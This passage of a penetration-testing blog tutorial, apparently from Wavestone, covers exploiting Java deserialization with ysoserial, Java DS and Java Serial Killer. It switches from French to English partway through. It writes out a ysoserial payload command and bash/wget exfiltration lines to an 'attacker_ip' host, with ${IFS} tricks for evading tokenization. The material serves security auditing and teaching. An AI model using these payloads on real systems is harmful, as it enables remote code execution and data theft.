Elle est suivie du num\u00e9ro de version, souvent 00 05.<\/li>\n<li>Attention : Parfois, les objets s\u00e9rialis\u00e9s sont en plus encod\u00e9s en base64, la s\u00e9quence <i>0xAC ED<\/i> devient alors <i>rO0<\/i><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<ul>\n<li><b>Chercher des noms de classes Java<\/b> dans les transactions, tels que <i>java.rmi.dgc.Lease<\/i>.\n<ul>\n<li>Dans certains cas, les noms de classe Java peuvent appara\u00eetre dans un autre format commen\u00e7ant par un \u00ab <b>L<\/b> \u00bb, se terminant par un \u00ab <b>;<\/b> \u00bb et utilisant des barres obliques pour s\u00e9parer les parties de l&#8217;espace de noms et le nom de la classe (par exemple, &#8220;<i>Ljava \/ rmi \/ dgc \/ VMID;&#8221;<\/i>).<\/li>\n<li>En raison de la sp\u00e9cification du format de s\u00e9rialisation, d&#8217;autres cha\u00eenes peuvent \u00eatre pr\u00e9sentes, telles que &#8220;<b>sr<\/b>&#8221; pouvant repr\u00e9senter un objet (TC_OBJECT) suivi de sa description de classe (TC_CLASSDESC) ou &#8220;<b>xp<\/b>&#8221; pouvant indiquer la fin des annotations de classe, (TC_ENDBLOCKDATA) pour une classe qui n&#8217;a pas de super classe (TC_NULL).<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<ul>\n<li><b>Chercher l&#8217;ent\u00eate\u00a0Content-Type\u00a0<\/b>suivant : application\/x-java-serialized-object<\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">Apr\u00e8s avoir identifi\u00e9 l&#8217;utilisation de donn\u00e9es s\u00e9rialis\u00e9es, il faut <b>identifier l\u2019offset dans ces donn\u00e9es o\u00f9 il est possible d\u2019injecter une charge utile<\/b>.<\/div>\n<div style=\"text-align: justify;\">La cible doit appeler <i>ObjectInputStream.readObject<\/i> pour d\u00e9s\u00e9rialiser et instancier un objet. Toutefois, elle peut appeler d&#8217;autres m\u00e9thodes de <i>ObjectInputStream<\/i>, telles que <i>readInt <\/i>qui lira simplement un entier \u00e0 4 octets dans le stream. 
La m\u00e9thode <i>readObject <\/i>lit les types de contenu suivants \u00e0 partir d&#8217;un flux de s\u00e9rialisation :<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li>0x70 \u2013 TC_NULL<\/li>\n<li>0x71 \u2013 TC_REFERENCE<\/li>\n<li>0x72 \u2013 TC_CLASSDESC<\/li>\n<li>0x73 \u2013 TC_OBJECT<\/li>\n<li>0x74 \u2013 TC_STRING<\/li>\n<li>0x75 \u2013 TC_ARRAY<\/li>\n<li>0x76 \u2013 TC_CLASS<\/li>\n<li>0x7B \u2013 TC_EXCEPTION<\/li>\n<li>0x7C \u2013 TC_LONGSTRING<\/li>\n<li>0x7D \u2013 TC_PROXYCLASSDESC<\/li>\n<li>0x7E \u2013 TC_ENUM<\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">Dans les cas les plus simples, la premi\u00e8re chose lue dans le flux de s\u00e9rialisation est directement l\u2019objet \u00e0 d\u00e9s\u00e9rialiser, et nous pouvons donc ins\u00e9rer notre charge directement apr\u00e8s l&#8217;en-t\u00eate de s\u00e9rialisation \u00e0 4 octets.<\/div>\n<div style=\"text-align: justify;\">Nous pouvons identifier ces cas en regardant les cinq premiers octets du flux de s\u00e9rialisation. <b>Si ces cinq octets sont un en-t\u00eate de s\u00e9rialisation \u00e0 quatre octets<\/b> (0xAC ED 00 05) <b>suivi d&#8217;une des valeurs r\u00e9pertori\u00e9es ci-dessus<\/b>, nous pouvons attaquer la cible en envoyant notre propre en-t\u00eate de s\u00e9rialisation \u00e0 quatre octets suivis d&#8217;un objet malveillant (la charge).<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">Dans d&#8217;autres cas, l&#8217;en-t\u00eate de s\u00e9rialisation \u00e0 quatre octets sera <b>probablement suivi d&#8217;un \u00e9l\u00e9ment TC_BLOCKDATA<\/b> (0x77) <b>ou d&#8217;un \u00e9l\u00e9ment TC_BLOCKDATALONG<\/b> (0x7A). 
The former carries a one-byte length followed by the block data; the latter a four-byte big-endian length followed by the block data.<\/div>\n<div style=\"text-align: justify;\">If the block data is followed by one of the element types accepted by <i>readObject<\/i>, we can inject a payload in place of that element, right after the block data.<\/div>\n<div style=\"text-align: justify;\">Nick Bloor wrote a tool, <b><a href=\"https:\/\/github.com\/NickstaDB\/SerializationDumper\" target=\"_blank\" rel=\"noopener\">SerializationDumper<\/a><\/b>, that makes this analysis easier. Example usage:<\/div>\n<div style=\"text-align: justify;\">\n<figure id=\"post-15736 media-15736\" class=\"align-none\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-15736 size-full\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I4.png\" alt=\"\" width=\"574\" height=\"198\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I4.png 574w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I4-437x151.png 437w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I4-71x24.png 71w\" sizes=\"auto, (max-width: 574px) 100vw, 574px\" \/><\/figure>\n<\/div>\n<div style=\"text-align: justify;\">In this example, the stream contains a TC_BLOCKDATA followed by a TC_STRING, which can be replaced with a payload.<\/div>\n<div style=\"text-align: justify;\">\n<h3>Method 2: automated, for better coverage<\/h3>\n<\/div>\n<div style=\"text-align: justify;\">To detect functions that use deserialization in an <b>automated<\/b> way, you can also use the <b><a href=\"https:\/\/github.com\/federicodotta\/Java-Deserialization-Scanner\/\" target=\"_blank\" rel=\"noopener\">Burp Java Deserialization Scanner<\/a><\/b> extension as a passive scanner, as an active scanner, or to test one specific function.<\/div>\n<div style=\"text-align: justify;\">The vulnerable libraries currently supported by the tool are:<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li>Apache Commons Collections 3 (up to 3.2.1)<\/li>\n<li>Apache Commons Collections 4 (up to 4.4.0)<\/li>\n<li>Spring (up to 4.2.2)<\/li>\n<li>Java 6 and Java 7 (up to Jdk7u21)<\/li>\n<li>Hibernate 5<\/li>\n<li>JSON<\/li>\n<li>Rome<\/li>\n<li>Java 8 (up to Jdk8u20)<\/li>\n<li>Apache Commons BeanUtils<\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\">To use the passive or active scanner, just open the corresponding Burp tab and wait for findings to appear:<\/div>\n<div style=\"text-align: justify;\">\n<figure id=\"post-15738 media-15738\" class=\"align-none\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-15738 size-full\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I5.png\" alt=\"\" width=\"640\" height=\"293\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I5.png 640w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I5-417x191.png 417w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I5-71x33.png 71w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/figure>\n<\/div>\n<div style=\"text-align: justify;\">To test one specific function, first intercept a request in Burp, then right-click it and send it to Java DS:<\/div>\n<div style=\"text-align: justify;\">\n<figure id=\"post-15740 media-15740\" class=\"align-none\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-15740 size-full\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I6.png\" alt=\"\" width=\"400\" height=\"290\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I6.png 400w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I6-263x191.png 263w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I6-54x39.png 54w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/figure>\n<\/div>\n<div style=\"text-align: justify;\">\n<p>The tool reports which payload types (gadget chains) appear to work, and therefore which vulnerable libraries are present on the application's classpath:<\/p>\n<figure id=\"post-15742 media-15742\" class=\"align-none\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-15742 size-full\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I7.png\" alt=\"\" width=\"640\" height=\"371\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I7.png 640w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I7-329x191.png 329w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I7-67x39.png 67w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I7-120x70.png 120w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/figure>\n<\/div>\n<div style=\"text-align: justify;\">\n<h3>Note<\/h3>\n<\/div>\n<div style=\"text-align: justify;\">The <b>Java DS<\/b> plug-in relies on a bundled open source payload (gadget chain) generator: <b>ysoserial<\/b>. Use the latest version of that tool, since it includes the most recent payload types, added as new vulnerabilities are discovered in serialization-related libraries.<\/div>\n<div style=\"text-align: justify;\">Once your project is created, remember to point the Java DS plug-in at the <b>ysoserial<\/b> jar you downloaded beforehand:<\/div>\n<div style=\"text-align: justify;\">\n<figure id=\"post-15744 media-15744\" class=\"align-none\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-15744 size-full\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I8.png\" alt=\"\" width=\"640\" height=\"194\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I8.png 640w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I8-437x132.png 437w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I8-71x22.png 71w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/figure>\n<\/div>\n<div style=\"text-align: justify;\">\n<h2>Attacking functions that use deserialization<\/h2>\n<\/div>\n<div style=\"text-align: justify;\">The deserialization logic used by the application can:<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li>be written specifically into the class of the object being deserialized (a custom private <i>readObject<\/i> method, which <i>ObjectInputStream<\/i> invokes by reflection)<\/li>\n<li>be hijacked through a gadget chain living in a third-party library on the application's classpath, the best known being Apache Commons Collections (in the example below, the application simply wraps its <i>readObject<\/i> call in a helper named <i>Utils<\/i>.<i>DeserializeFromFile<\/i>)<\/li>\n<li>take many other forms: the <i>readResolve<\/i>, <i>readExternal<\/i> and <i>readUnshared<\/i> methods, the <i>XStream<\/i> library, etc.<\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\">The <b>Java Deserialization Scanner<\/b> extension will have identified the library present. The next step is therefore to generate the payload (gadget chain) matching that library.<\/div>\n<div style=\"text-align: justify;\">There are three ways to do this:<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li>Generate a payload with ysoserial and send it to the server<\/li>\n<li>Use the Burp Java Deserialization Scanner extension<\/li>\n<li>Use the Burp Java Serial Killer extension<\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\">\n<h3>Method 1: ysoserial<\/h3>\n<\/div>\n<div style=\"text-align: justify;\">One of the most significant deserialization vulnerabilities was discovered in the <b>Apache Commons Collections<\/b> library.<\/div>\n<div style=\"text-align: justify;\">If a vulnerable version of this library (or of another library with a known gadget chain) is on the classpath of the application doing the deserialization, the vulnerability can lead to <b>remote code execution<\/b>.<\/div>\n<div style=\"text-align: justify;\">To exploit it we can use <b>ysoserial<\/b>, a collection of gadget chains that generates malicious serialized objects which run commands when they are deserialized.<\/div>\n<div style=\"text-align: justify;\">You only have to name the vulnerable library (the payload type). Example for a Windows target:<\/div>\n<div style=\"text-align: justify;\"><span class=\"w-code\">java -jar ysoserial-master.jar CommonsCollections5 calc.exe &gt; wave.stone<\/span><\/div>\n<div style=\"text-align: justify;\">This produces a serialized object (the file wave.stone) targeting the vulnerable <b>Apache Commons Collections<\/b> library; on deserialization the gadget chain runs the command \"<b>calc.exe<\/b>\".<\/div>\n<div style=\"text-align: justify;\">If the following code is present on the server side:<\/div>\n<div style=\"text-align: justify;\"><span class=\"w-code\">LogFile objet = new LogFile();<br \/>\nString file = \"wave.stone\";<br \/>\n\/\/ Deserialize the object<br \/>\nobjet = (LogFile) Utils.DeserializeFromFile(file);<\/span><\/div>\n<div style=\"text-align: justify;\">then, after the malicious payload has been sent to the server (via <b>Burp<\/b>), the server-side output will be:<\/div>\n<div style=\"text-align: justify;\"><span class=\"w-code\">Deserializing from wave.stone<br \/>\n<span class=\"w-grepped\">Exception in thread \"main\" java.lang.ClassCastException:<br \/>\njava.management\/javax.management.BadAttributeValueExpException<br \/>\ncannot be cast to LogFile at LogFiles.main(LogFiles.java:105)<\/span><br \/>\n<\/span><\/div>\n<div style=\"text-align: justify;\">Note that the <i>ClassCastException<\/i> is raised only when the already deserialized object is cast to <i>LogFile<\/i>: the gadget chain, rooted here in <i>BadAttributeValueExpException<\/i>, has already run inside <i>readObject<\/i>, so the exception does not stop the attack.<\/div>\n<div style=\"text-align: justify;\">And the result on the server is the execution of calc.exe:<\/div>\n<div style=\"text-align: justify;\">\n<figure id=\"post-15746 media-15746\" class=\"align-none\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-15746 size-full\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I9.png\" alt=\"\" width=\"326\" height=\"502\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I9.png 326w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I9-124x191.png 124w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I9-25x39.png 25w\" sizes=\"auto, (max-width: 326px) 100vw, 326px\" \/><\/figure>\n<\/div>\n<div style=\"text-align: justify;\">\n<h3>Method 2: Java DS<\/h3>\n<\/div>\n<div style=\"text-align: justify;\">Following the <b>detection phase<\/b>, we know that a payload (gadget chain) forged for <b>CommonsCollections1<\/b> works against our target.<\/div>\n<div style=\"text-align: justify;\">From the \"<b>Exploiting<\/b>\" tab of Java DS, we can craft and send our own payloads.<\/div>\n<div style=\"text-align: justify;\">For example, to try to run <i>uname -a<\/i> on the remote system (assuming it is Unix), enter the following command:<\/div>\n<div style=\"text-align: justify;\">\n<figure id=\"post-15748 media-15748\" class=\"align-none\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-15748 size-full\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I10.png\" alt=\"\" width=\"640\" height=\"479\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I10.png 640w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I10-255x191.png 255w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I10-52x39.png 52w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/figure>\n<\/div>\n<div style=\"text-align: justify;\">Here the server returns another serialized object in response, which tells us nothing about whether our command succeeded, let alone what it printed.<\/div>\n<div style=\"text-align: justify;\">\n<figure id=\"post-15750 media-15750\" class=\"align-none\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-15750 size-full\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I11.png\" alt=\"\" width=\"640\" height=\"496\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I11.png 640w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I11-246x191.png 246w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I11-50x39.png 50w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I11-156x121.png 156w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I11-155x120.png 155w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/figure>\n<\/div>\n<div style=\"text-align: justify;\">One technique for confirming that our commands actually run is a time-based side channel: by <b>pausing the process with a Java sleep payload<\/b>, we can <b>demonstrate with certainty that the application is vulnerable by measuring the server's response time<\/b> (compare against a baseline request, and repeat with a different delay to rule out network jitter).<\/div>\n<div style=\"text-align: justify;\">A sleep-based payload is therefore enough to establish the vulnerability, but if you have time and want to go further, it is <b>possible to retrieve the command output<\/b> by running a web server on your own machine and having the target server request it.<\/div>\n<div style=\"text-align: justify;\">To do so, start a web server on your audit machine:<\/div>\n<div style=\"text-align: justify;\"><span class=\"w-code\">python -m SimpleHTTPServer 80<\/span><\/div>\n<div style=\"text-align: justify;\">(or, with Python 3, <span class=\"w-code\">python3 -m http.server 80<\/span>)<\/div>\n<div style=\"text-align: justify;\">The goal is then to get the target server to execute this command:<\/div>\n<div style=\"text-align: justify;\"><span class=\"w-code\">wget <span class=\"w-grepped\">attacker_ip<\/span>\/`uname -a | base64`<\/span><\/div>\n<div style=\"text-align: justify;\">The Apache Commons Collections gadget chain hands our command string to <b>java.lang.Runtime.exec(String)<\/b>.<\/div>\n<div style=\"text-align: justify;\"><i>Runtime.exec<\/i> splits that string on whitespace (with a <i>StringTokenizer<\/i>), starts the first token as a program and passes the rest as its arguments. There is no parent shell, so pipes, redirections, quotes and backticks are passed to the program literally instead of being interpreted, which quickly limits what we can do\u2026 But we can get a shell by invoking <b>bash -c<\/b> through <i>Runtime.exec<\/i>.<\/div>\n<div style=\"text-align: justify;\">However, because of that whitespace tokenization, any space inside the command we want bash to run splits it into separate arguments, and <b>bash -c<\/b> executes only the first of them. Two approaches work around this:<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li>Use bash's own string expansion instead of spaces. For example, the following command stores the base64 of the output of echo yoloswag in the variable c (brace expansion turns {echo,yoloswag} into echo yoloswag), then appends it to the path of the wget request; the whole argument to -c contains no whitespace, so it reaches bash intact:<\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\"><span class=\"w-code\">bash -c c=`{echo,yoloswag}|base64`&amp;&amp;{wget,<span class=\"w-grepped\">attacker_ip<\/span>\/$c}<\/span><\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li>Use the $IFS variable (bash's internal field separator, which defaults to space, tab and newline) in place of the spaces in the command handed to bash. Here, to run uname -a (the braces in ${IFS} are needed: bash would otherwise read the digits of the IP address that follow as part of the variable name, i.e. $IFS54 instead of $IFS):<\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\"><span class=\"w-code\">bash -c wget${IFS}<span class=\"w-grepped\">attacker_ip<\/span>\/`uname${IFS}-a|base64`<\/span><\/div>\n<div style=\"text-align: justify;\">Two practical caveats: GNU base64 wraps its output every 76 characters, and the resulting newline would split a long output into several words (and therefore several URLs), so add <span class=\"w-code\">-w0<\/span> (<span class=\"w-code\">base64${IFS}-w0<\/span> in the form above); and the base64 alphabet includes + and \/, so the request path may contain extra slashes, which matters when you extract it from the log below.<\/div>\n<div style=\"text-align: justify;\">One last important point: in some situations slashes and dollar signs have to be escaped; it all depends on the payload and on the functions involved.<\/div>\n<div style=\"text-align: justify;\">Here, with an audit machine whose IP is 54.161.175.139:<\/div>\n<div style=\"text-align: justify;\">\n<figure id=\"post-15752 media-15752\" class=\"align-none\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-15752 size-full\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I12.png\" alt=\"\" width=\"640\" height=\"374\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I12.png 640w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I12-327x191.png 327w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I12-67x39.png 67w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I12-120x70.png 120w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/figure>\n<\/div>\n<div style=\"text-align: justify;\">The result on the web server running on the audit machine is the following:<\/div>\n<div style=\"text-align: justify;\">\n<figure id=\"post-15760 media-15760\" class=\"align-none\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-15760 size-full\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I12-bis.png\" alt=\"\" width=\"640\" height=\"32\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I12-bis.png 640w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I12-bis-437x22.png 437w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I12-bis-71x4.png 71w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/figure>\n<\/div>\n<div style=\"text-align: justify;\">A request from the target server's IP appears, to a base64-encoded URL that corresponds to the output of the \"<b>uname -a<\/b>\" command.<\/div>\n<div style=\"text-align: justify;\">Indeed, after extracting the data and base64-decoding it with the following command (the fourth slash-separated field, because the request line is preceded by a timestamp such as [10\/Jul\/2019 10:00:29], which itself contains two slashes):<\/div>\n<div style=\"text-align: justify;\"><span class=\"w-code\">tail -n1 access.log | cut -d\/ -f4 | cut -d' ' -f1 | base64 -d<\/span><\/div>\n<div style=\"text-align: justify;\">the following result appears:<\/div>\n<div style=\"text-align: justify;\">\n<figure id=\"post-15762 media-15762\" class=\"align-none\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-15762 size-full\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I12-ter.png\" alt=\"\" width=\"640\" height=\"29\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I12-ter.png 640w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I12-ter-437x20.png 437w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I12-ter-71x3.png 71w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/figure>\n<\/div>\n<div style=\"text-align: justify;\">You have successfully executed a <b>uname -a<\/b> command on the target server: you are now an accomplished serial hacker!<\/div>\n<div style=\"text-align: justify;\">\n<figure id=\"post-15754 media-15754\" class=\"align-none\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-15754 size-full\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I13.jpg\" alt=\"\" width=\"320\" height=\"212\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I13.jpg 320w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I13-288x191.jpg 288w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I13-59x39.jpg 59w\" sizes=\"auto, (max-width: 320px) 100vw, 320px\" \/><\/figure>\n<div style=\"text-align: center;\"><i><span style=\"font-size: x-small;\">The master deserializer wants to shake your hand<\/span><\/i><\/div>\n<\/div>\n<div style=\"text-align: justify;\">\n<h3>Method 3: Java Serial Killer<\/h3>\n<\/div>\n<div style=\"text-align: justify;\">Following the <b>detection phase<\/b>, we know that a payload (gadget chain) forged for <b>CommonsCollections1<\/b> works against our target.<\/div>\n<div style=\"text-align: justify;\">You can then use the <b>Java Serial Killer<\/b> Burp extension: right-clicking a POST request whose body contains a serialized Java object lets you send it to the extension:<\/div>\n<div style=\"text-align: justify;\">\n<figure id=\"post-15764 media-15764\" class=\"align-none\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-15764 size-full\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I13-bis.png\" alt=\"\" width=\"640\" height=\"229\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I13-bis.png 640w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I13-bis-437x156.png 437w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I13-bis-71x25.png 71w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/figure>\n<\/div>\n<div style=\"text-align: justify;\">Then go to the \"Java Serial Killer\" Burp tab:<\/div>\n<div style=\"text-align: justify;\">\n<figure id=\"post-15756 media-15756\" class=\"align-none\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-15756 size-full\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I14.png\" alt=\"\" width=\"640\" height=\"327\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I14.png 640w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I14-374x191.png 374w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I14-71x36.png 71w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/figure>\n<\/div>\n<div style=\"text-align: justify;\">This tab takes as input:<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li>A command to execute on the target server<\/li>\n<li>The vulnerable library to exploit<\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\">For example, to send a ping request to <b>wavestone.com<\/b> using the <b>CommonsCollections1<\/b> payload type, since the detection phase told us it works:<\/div>\n<div style=\"text-align: justify;\">\n<figure id=\"post-15758 media-15758\" class=\"align-none\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-15758 size-full\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I15.png\" alt=\"\" width=\"640\" height=\"333\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I15.png 640w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I15-367x191.png 367w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I15-71x37.png 71w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/figure>\n<\/div>\n<div style=\"text-align: justify;\">\n<p>The payload can also be base64-encoded, if that is the format the server expects (see the small checkbox to the right of \"Serialize\").<\/p>\n<\/div>\n<h2 style=\"text-align: justify;\">Conclusion<\/h2>\n<div style=\"text-align: justify;\">You now have the theoretical basics needed to understand Java deserialization vulnerabilities, together with the practical techniques and tooling to exploit them in the best-known libraries, without prior knowledge of the application code.<\/div>\n<div style=\"text-align: justify;\">Keep in mind, however, that these libraries are not involved in 100% of deserialization cases, as seen in the chapter \"Attack example: user account compromise\", where the exploited vulnerability did not even involve sending the server code to execute. 
More specific exploits therefore rely heavily on knowledge of the code reachable through deserialization (or on reverse engineering it). Hence the difficulty of exploiting deserialization vulnerabilities, despite the sometimes enormous impact of this class of flaw.<\/div>\n<div style=\"text-align: justify;\">Serialization\/deserialization is moreover not a concept exclusive to Java; it exists in many other programming languages, notably:<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li><b>Python: <\/b>pickling \/ unpickling<\/li>\n<li><b>PHP: <\/b>serializing \/ deserializing<\/li>\n<li><b>Ruby: <\/b>marshalling \/ unmarshalling<\/li>\n<li>\u2026<\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\">The overall methodology stays the same, but the tools vary (<b>Freddy<\/b> instead of <b>ysoserial<\/b> for XML-based deserialization engines, for instance\u2026).<\/div>\n<div style=\"text-align: justify;\">The following cheat sheet gives good audit leads for these other languages and technologies:<\/div>\n<div style=\"text-align: justify;\"><a href=\"https:\/\/github.com\/OWASP\/CheatSheetSeries\/blob\/master\/cheatsheets\/Deserialization_Cheat_Sheet.md\">https:\/\/github.com\/OWASP\/CheatSheetSeries\/blob\/master\/cheatsheets\/Deserialization_Cheat_Sheet.md<\/a>.<\/div>\n<h3 style=\"text-align: justify;\">Sources and references to go further<\/h3>\n<div style=\"text-align: justify;\">Nytro's article on Java deserialization<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li><a href=\"https:\/\/nytrosecurity.com\/2018\/05\/30\/understanding-java-deserialization\/\">https:\/\/nytrosecurity.com\/2018\/05\/30\/understanding-java-deserialization\/<\/a><\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\">Synopsys paper explaining how to exfiltrate data through Java deserialization and how to get around the main technical limitations you may run into<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li><a href=\"https:\/\/www.synopsys.com\/content\/dam\/synopsys\/sig-assets\/whitepapers\/exploiting-the-java-deserialization-vulnerability.pdf\">https:\/\/www.synopsys.com\/content\/dam\/synopsys\/sig-assets\/whitepapers\/exploiting-the-java-deserialization-vulnerability.pdf<\/a><\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\">Java deserialization cheat sheet<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li><a href=\"https:\/\/github.com\/GrrrDog\/Java-Deserialization-Cheat-Sheet\">https:\/\/github.com\/GrrrDog\/Java-Deserialization-Cheat-Sheet<\/a><\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\">Java deserialization with Burp<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li><a 